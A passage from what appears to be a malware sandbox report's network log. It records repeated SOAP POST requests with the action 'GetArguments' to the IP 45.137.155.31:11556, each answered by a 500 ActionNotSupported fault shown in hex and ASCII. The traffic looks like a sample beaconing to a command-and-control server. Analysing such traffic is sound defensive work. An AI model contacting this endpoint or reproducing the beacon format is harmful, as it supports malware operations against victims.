20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:24.700164080 CEST10637OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:24.783130884 CEST10637INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:24.860424042 CEST10638INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:24 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:25.871798992 CEST10638OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:25.941642046 CEST10638INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:26.011050940 CEST10639INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:25 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:27.028424025 CEST10640OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:27.097578049 CEST10640INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:27.167331934 CEST10641INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:27 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:28.184715986 CEST10641OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:28.254736900 CEST10641INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:28.326293945 CEST10642INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:28 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:29.341274023 CEST10643OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:29.409929991 CEST10643INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:29.480310917 CEST10644INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:29 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
                                  Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><s:Fault><faultcode xmlns:a="http://schemas.microsoft.com/ws/2005/05/addressing/none">a:ActionNotSupported</faultcode><faultstring xml:lang="en-US">The message with Action 'http://tempuri.org/Endpoint/GetArguments' cannot be processed at the receiver, due to a ContractFilter mismatch at the EndpointDispatcher. This may be because of either a contract mismatch (mismatched Actions between sender and receiver) or a binding/security mismatch between the sender and the receiver. Check that sender and receiver have the same contract and the same binding (including security requirements, e.g. Message, Transport, None).</faultstring></s:Fault></s:Body></s:Envelope>
                                  Aug 3, 2021 23:09:30.498008013 CEST10644OUTPOST / HTTP/1.1
                                  Content-Type: text/xml; charset=utf-8
                                  SOAPAction: "http://tempuri.org/Endpoint/GetArguments"
                                  Host: 45.137.155.31:11556
                                  Content-Length: 137
                                  Expect: 100-continue
                                  Accept-Encoding: gzip, deflate
                                  Aug 3, 2021 23:09:30.567215919 CEST10644INHTTP/1.1 100 Continue
                                  Aug 3, 2021 23:09:30.640692949 CEST10645INHTTP/1.1 500 Internal Server Error
                                  Content-Length: 738
                                  Content-Type: text/xml; charset=utf-8
                                  Server: Microsoft-HTTPAPI/2.0
                                  Date: Tue, 03 Aug 2021 21:09:30 GMT
                                  Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 73 3a 46 61 75 6c 74 3e 3c 66 61 75 6c 74 63 6f 64 65 20 78 6d 6c 6e 73 3a 61 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 77 73 2f 32 30 30 35 2f 30 35 2f 61 64 64 72 65 73 73 69 6e 67 2f 6e 6f 6e 65 22 3e 61 3a 41 63 74 69 6f 6e 4e 6f 74 53 75 70 70 6f 72 74 65 64 3c 2f 66 61 75 6c 74 63 6f 64 65 3e 3c 66 61 75 6c 74 73 74 72 69 6e 67 20 78 6d 6c 3a 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 54 68 65 20 6d 65 73 73 61 67 65 20 77 69 74 68 20 41 63 74 69 6f 6e 20 27 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 45 6e 64 70 6f 69 6e 74 2f 47 65 74 41 72 67 75 6d 65 6e 74 73 27 20 63 61 6e 6e 6f 74 20 62 65 20 70 72 6f 63 65 73 73 65 64 20 61 74 20 74 68 65 20 72 65 63 65 69 76 65 72 2c 20 64 75 65 20 74 6f 20 61 20 43 6f 6e 74 72 61 63 74 46 69 6c 74 65 72 20 6d 69 73 6d 61 74 63 68 20 61 74 20 74 68 65 20 45 6e 64 70 6f 69 6e 74 44 69 73 70 61 74 63 68 65 72 2e 20 54 68 69 73 20 6d 61 79 20 62 65 20 62 65 63 61 75 73 65 20 6f 66 20 65 69 74 68 65 72 20 61 20 63 6f 6e 74 72 61 63 74 20 6d 69 73 6d 61 74 63 68 20 28 6d 69 73 6d 61 74 63 68 65 64 20 41 63 74 69 6f 6e 73 20 62 65 74 77 65 65 6e 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 29 20 6f 72 20 61 20 62 69 6e 64 69 6e 67 2f 73 65 63 75 72 69 74 79 20 6d 69 73 6d 61 74 63 68 20 62 65 74 77 65 65 6e 20 74 68 65 20 73 65 6e 64 65 72 20 61 6e 64 20 74 68 65 20 72 65 63 65 69 76 65 72 2e 20 20 43 68 65 63 6b 20 74 68 61 74 20 73 65 6e 64 65 72 20 61 6e 64 20 72 65 63 65 69 76 65 72 20 68 61 76 65 20 74 68 65 20 73 61 6d 65 20 63 6f 6e 74 72 61 63 74 20 61 6e 64 20 74 68 65 20 73 61 6d 65 20 62 69 6e 64 69 6e 67 20 28 69 6e 63 6c 75 64 69 6e 67 20 73 65 63 75 72 69 74 79 20 72 65 71 75 69 72 65 6d 65 6e 74 73 2c 20 65 2e 67 2e 20 4d 65 73 73 61 67 65 2c 20 54 72 61 6e 73 70 6f 72 74 2c 20 4e 6f 6e 65 29 2e 3c 2f 66 61 75 6c 74 73 74 72 69 6e 67 3e 3c 2f 73 3a 46 61 75 6c 74 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e
